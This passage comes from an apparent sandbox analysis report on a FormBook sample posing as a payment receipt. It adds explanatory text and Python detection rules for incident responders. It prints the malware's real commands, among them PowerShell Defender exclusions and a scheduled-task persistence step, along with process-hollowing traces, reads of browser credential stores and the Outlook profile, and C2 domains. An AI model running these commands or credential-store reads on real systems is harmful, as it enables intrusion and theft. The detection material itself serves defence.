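    syscall, since an indirect jmp into ntdll's syscall instruction returns to the
    caller's own frame as well)."""
    m = module_for(ret_addr, modules)
    if m is None:
        return "direct", f"{api} issued from unbacked memory at 0x{ret_addr:08X}"
    if m.name.lower() != "ntdll.dll":
        return "direct", f"{api} issued from {m.name}+0x{ret_addr - m.base:X}"
    return "ntdll", f"{api} via ntdll+0x{ret_addr - m.base:X}"

def triage(calls, modules=MODULES):
    """Keep only stub-bypassing calls, ranked by how dangerous the API is."""
    findings = []
    for api, ret_addr in calls:
        verdict, why = classify_syscall(api, ret_addr, modules)
        if verdict == "direct":
            findings.append(("high" if api in SENSITIVE else "low", api, why))
    return findings

DIRECT_RE = re.compile(r"(?P<api>Nt\w+):\s*Direct from:\s*0x(?P<addr>[0-9A-Fa-f]+)")

def parse_report_lines(lines):
    """Lift (api, address) pairs out of lines in the report's 'NtXxx: Direct from: 0x...' form."""
    return [(m["api"], int(m["addr"], 16)) for m in map(DIRECT_RE.search, lines) if m]

if __name__ == "__main__":
    for sev, api, why in triage(SAMPLE_CALLS):
        print(f"[{sev}] {why}")
```

On WOW64 the 32-bit ntdll stub hands off to wow64cpu rather than executing `syscall` itself, but the rule is unchanged: the 32-bit frame that initiated the transition has to be ntdll's stub, and a frame in the process image or in a private RWX allocation is the finding.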
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: NULL target: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe protection: read write
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: NULL target: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 7964
                Source: C:\Windows\SysWOW64\wlanext.exe | Thread APC queued: target process: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6C0008
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe"
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe"
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp"
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp"
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
                Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
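Read together, the lines from the Defender exclusions through the process creations above are the chain a responder reconstructs from this report: the dropper on the Desktop spawns PowerShell to exclude both itself and its persistence copy (fttQgpyzkkc.exe in Roaming) from Defender scanning, registers the scheduled task Updates\fttQgpyzkkc from a task XML in the user's Temp directory, starts RegSvcs.exe with no arguments and writes a PE over its image base 0x400000 (the bytes 4D5A are the MZ header), which is process hollowing of a signed .NET utility; the hollowed process then reaches into wlanext.exe, which sets a foreign thread's registers and queues an APC in VfJW2xm7a.exe, and finally touches firefox.exe. The Python below is an added example, not part of the report: five detection rules run over a constructed excerpt of these lines (reformatted with the `|` separator used above) plus one constructed benign control line; the rule names, severities and the control line are the example's own.

```python
import re

# Constructed excerpt of this report's behaviour lines, plus one benign control line at the end.
EVENTS = r"""
Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe"
Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp"
Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 7964
Source: C:\Windows\SysWOW64\wlanext.exe | Thread APC queued: target process: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe
Source: C:\Program Files\Vendor\updater.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Vendor\Update" /XML "C:\ProgramData\Vendor\task.xml"
"""

LINE_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*\|\s*(?P<kind>[A-Za-z ]+?):\s*(?P<detail>.+)$")
PROC_RE = re.compile(r'^(?P<image>.+?)\s+"(?P<exe>[^"]+)"\s*(?P<args>.*)$')
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Desktop|Downloads|AppData\\(Roaming|Local\\Temp))\\", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%TEMP%", re.I)
HOLLOW_HOSTS = ("regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe")

def parse_events(text):
    return [m.groupdict() for m in map(LINE_RE.match, text.strip().splitlines()) if m]

def _proc(ev):
    return PROC_RE.match(ev["detail"]) if ev["kind"] == "Process created" else None

def rule_defender_exclusion(ev):
    m = _proc(ev)
    if not m or "powershell" not in m["image"].lower():
        return None
    if not re.search(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", m["args"], re.I):
        return None
    # Excluding a path the current user can write to is the malware-shields-itself pattern.
    sev = "high" if USER_WRITABLE.search(m["args"]) else "medium"
    return sev, "Defender exclusion added: " + m["args"]

def rule_schtasks_from_temp(ev):
    m = _proc(ev)
    if not m or not m["image"].lower().endswith("schtasks.exe"):
        return None
    if "/create" not in m["args"].lower() or not TEMP_DIR.search(m["args"]):
        return None
    return "high", "scheduled task created from a temp-dir XML: " + m["args"]

def rule_lolbin_host(ev):
    m = _proc(ev)
    if not m or not m["image"].lower().endswith(HOLLOW_HOSTS):
        return None
    if not USER_WRITABLE.search(ev["src"]):
        return None
    note = " with no arguments" if not m["args"].strip() else ""
    return "high", f"{ev['src']} launched {m['image']}{note} (common hollowing host)"

def rule_pe_written_to_foreign_process(ev):
    if ev["kind"] != "Memory written":
        return None
    m = re.match(r"(?P<target>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)\s+value starts with:\s*4D5A", ev["detail"], re.I)
    if not m:
        return None
    return "high", f"MZ header written into {m['target']} at 0x{int(m['base'], 16):08X}"

def rule_thread_manipulation(ev):
    if ev["kind"] not in ("Thread register set", "Thread APC queued"):
        return None
    return "high", f"{ev['kind']} by {ev['src']} -> {ev['detail']}"

RULES = [rule_defender_exclusion, rule_schtasks_from_temp, rule_lolbin_host,
         rule_pe_written_to_foreign_process, rule_thread_manipulation]

def triage(text):
    """Run every rule over every parsed line; one hit dict per (line, rule) match."""
    hits = []
    for ev in parse_events(text):
        for rule in RULES:
            r = rule(ev)
            if r:
                hits.append({"rule": rule.__name__[len("rule_"):], "severity": r[0],
                             "source": ev["src"], "detail": r[1]})
    return hits

if __name__ == "__main__":
    for h in triage(EVENTS):
        print(f"[{h['severity']}] {h['rule']}: {h['detail']}")
```

On a live host the first two findings are confirmed directly: `Get-MpPreference` lists ExclusionPath entries, and `Get-ScheduledTask -TaskPath '\Updates\'` shows the task; both must be removed before the persistence copy in Roaming is deleted, otherwise the task re-launches it.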
                Source: VfJW2xm7a.exe, 00000010.00000002.4518347539.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000000.2203703981.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4518707536.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: VfJW2xm7a.exe, 00000010.00000002.4518347539.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000000.2203703981.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4518707536.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: VfJW2xm7a.exe, 00000010.00000002.4518347539.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000000.2203703981.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4518707536.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: VfJW2xm7a.exe, 00000010.00000002.4518347539.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000000.2203703981.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4518707536.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Queries volume information: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Queries volume information: C:\Windows\Fonts\micross.ttf
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information (distinct targets, each with the number of times the query is listed in the report):
                  12x C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
                  2x C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
                  2x C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
                  2x C:\
                  2x C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
                  2x C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
                  2x C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
                  2x C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
                  2x C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
                  2x C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
                  2x C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
                  2x C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
                  13x C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
                  2x C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Queries volume information: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000011.00000002.4517196655.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.4517755223.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2279407307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2280315189.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.4517662913.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2281808721.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.4518790088.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\wlanext.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\wlanext.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\wlanext.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\wlanext.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\wlanext.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\wlanext.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\wlanext.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\wlanext.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\wlanext.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
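Two of the behaviours recorded in this report are cheap to detect from endpoint telemetry: the schtasks /Create whose /XML task definition sits under %LOCALAPPDATA%\Temp (the pattern behind the "Scheduled temp file as task from temp location" Sigma hit), and the Chromium credential stores and Outlook profile key being opened by wlanext.exe, a process that has no business reading them. The following detection logic is an added example and is not part of the Joe Sandbox report or of any Joe Sandbox tooling. It runs over constructed Sysmon-style event dictionaries (the field names Image, ParentImage, CommandLine, TargetFilename and TargetObject are assumed); the positive events reuse the command line, paths and key from the report, while the msiexec.exe-spawned schtasks call and the chrome.exe read are invented benign negatives.

```python
from __future__ import annotations

import re

# Constructed Sysmon-style events (assumed field names; not Joe Sandbox output).
# Events 1, 3 and 5 reproduce behaviour observed in the report; events 2 and 4
# are hypothetical benign negatives used to check the rules do not over-fire.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate",
     "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "ParentImage": r"C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" '
                    r'/XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp"'},
    {"type": "ProcessCreate",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",  # hypothetical installer
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "\Vendor\Updater" '
                    r'/XML "C:\ProgramData\Vendor\updater.xml"'},
    {"type": "FileOpen",
     "Image": r"C:\Windows\SysWOW64\wlanext.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "FileOpen",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",  # hypothetical benign read
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "RegistryOpen",
     "Image": r"C:\Windows\SysWOW64\wlanext.exe",
     "TargetObject": "HKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
                     "Windows Messaging Subsystem\\Profiles\\Outlook\\"},
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
CHROMIUM_ROOT_RE = re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\", re.IGNORECASE)
OUTLOOK_PROFILE_RE = re.compile(r"\\Windows Messaging Subsystem\\Profiles\\Outlook", re.IGNORECASE)
CRED_FILES = {"login data", "web data", "cookies", "local state"}
BROWSER_IMAGES = {"chrome.exe", "msedge.exe"}  # processes expected to read Chromium stores
MAIL_IMAGES = {"outlook.exe"}                  # processes expected to read Outlook profiles


def split_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(cmdline)]


def parse_schtasks(cmdline: str) -> dict[str, str]:
    """Map schtasks switches (lower-cased) to their argument, '' for bare flags."""
    args = split_cmdline(cmdline)
    opts: dict[str, str] = {}
    i = 1  # args[0] is the executable itself
    while i < len(args):
        switch = args[i].lower()
        if switch in ("/tn", "/xml", "/tr", "/sc", "/ru"):
            opts[switch] = args[i + 1] if i + 1 < len(args) else ""
            i += 2
        else:
            if switch.startswith("/"):
                opts[switch] = ""
            i += 1
    return opts


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_schtasks_from_temp(ev: dict) -> dict | None:
    """schtasks /Create whose /XML task definition lives in a temp directory."""
    if ev["type"] != "ProcessCreate" or basename(ev["Image"]) != "schtasks.exe":
        return None
    opts = parse_schtasks(ev["CommandLine"])
    xml = opts.get("/xml", "")
    if "/create" in opts and TEMP_DIR_RE.search(xml):
        return {"rule": "schtasks_create_from_temp_xml",
                "task": opts.get("/tn", ""), "xml": xml, "parent": ev["ParentImage"]}
    return None


def detect_cred_store_access(ev: dict) -> dict | None:
    """Browser or mail credential store opened by a process other than the owning client."""
    image = basename(ev["Image"])
    if ev["type"] == "FileOpen":
        target = ev["TargetFilename"]
        if (CHROMIUM_ROOT_RE.search(target) and basename(target) in CRED_FILES
                and image not in BROWSER_IMAGES):
            return {"rule": "browser_cred_store_read_by_non_browser",
                    "image": ev["Image"], "target": target}
    elif ev["type"] == "RegistryOpen":
        target = ev["TargetObject"]
        if OUTLOOK_PROFILE_RE.search(target) and image not in MAIL_IMAGES:
            return {"rule": "outlook_profile_read_by_non_mail_client",
                    "image": ev["Image"], "target": target}
    return None


RULES = (detect_schtasks_from_temp, detect_cred_store_access)


def run(events) -> list[dict]:
    """Apply every rule to every event; alerts come back in event order."""
    return [hit for ev in events for rule in RULES if (hit := rule(ev)) is not None]


if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert)
```

Against the constructed events this yields three alerts (the temp-XML task creation, the Login Data read and the Outlook profile key read) and stays silent on the two negatives. Allow-listing by image basename is deliberately simple and is bypassable by a dropper that names itself chrome.exe; a production rule should key on the signed image path or process GUID instead. It still fires on the behaviour shown here because FormBook's host is the genuine, Microsoft-signed wlanext.exe, which is not a browser or mail client under any naming.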

                Remote Access Functionality

                Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000011.00000002.4517196655.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.4517755223.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2279407307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2280315189.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.4517662913.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2281808721.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.4518790088.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix: techniques with matched signatures, grouped by tactic (the leading number is the count of signatures mapped to that technique)

                Execution: 1 Scheduled Task/Job
                Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading
                Privilege Escalation: 612 Process Injection; 1 Scheduled Task/Job; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading
                Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 612 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading
                Credential Access: 1 OS Credential Dumping
                Discovery: 221 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 113 System Information Discovery
                Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System
                Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol
                No signatures are mapped to Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration or Impact.
                Behavior Graph (ID 1622568; sample PAYMENT RECEIPT_USD21,000.exe; start date 24/02/2025; architecture WINDOWS; score 100)

                Contacted domains: www.nevath.xyz, www.needethereum.xyz and 16 other IPs or domains. Signature on www.needethereum.xyz: Performs DNS queries to domains with low reputation.
                Top-level signatures: Sigma detected: Scheduled temp file as task from temp location; Multi AV Scanner detection for submitted file; Yara detected FormBook; 7 other signatures.

                PAYMENT RECEIPT_USD21,000.exe (started)
                  dropped files: C:\Users\user\AppData\...\fttQgpyzkkc.exe (PE32); C:\Users\...\fttQgpyzkkc.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp3A9E.tmp (XML); C:\...\PAYMENT RECEIPT_USD21,000.exe.log (ASCII)
                  signature: Adds a directory exclusion to Windows Defender
                  -> RegSvcs.exe (started)
                       signature: Maps a DLL or memory area into another process
                       -> VfJW2xm7a.exe (injected)
                            signature: Found direct / indirect Syscall (likely to bypass EDR)
                            -> wlanext.exe (started)
                                 signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                                 -> VfJW2xm7a.exe (injected)
                                      network: www.nevath.xyz 203.161.42.73 ports 53341, 53342, 53343 (VNPT-AS-VNVNPTCorpVN, Malaysia); www.conpactum.xyz 13.248.169.48 ports 49841, 53273, 53289 (AMAZON-02US, United States); 7 other IPs or domains
                                      signature: Found direct / indirect Syscall (likely to bypass EDR)
                                 -> firefox.exe (started)
                  -> powershell.exe (started)
                       signature: Loading BitLocker PowerShell Module
                       -> WmiPrvSE.exe (started)
                       -> conhost.exe (started)
                  -> powershell.exe (started)
                       -> conhost.exe (started)
                  -> schtasks.exe (started)
                       -> conhost.exe (started)

                fttQgpyzkkc.exe (started)
                  signatures: Multi AV Scanner detection for dropped file; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
                  -> schtasks.exe (started)
                       -> conhost.exe (started)
                  -> RegSvcs.exe (started)
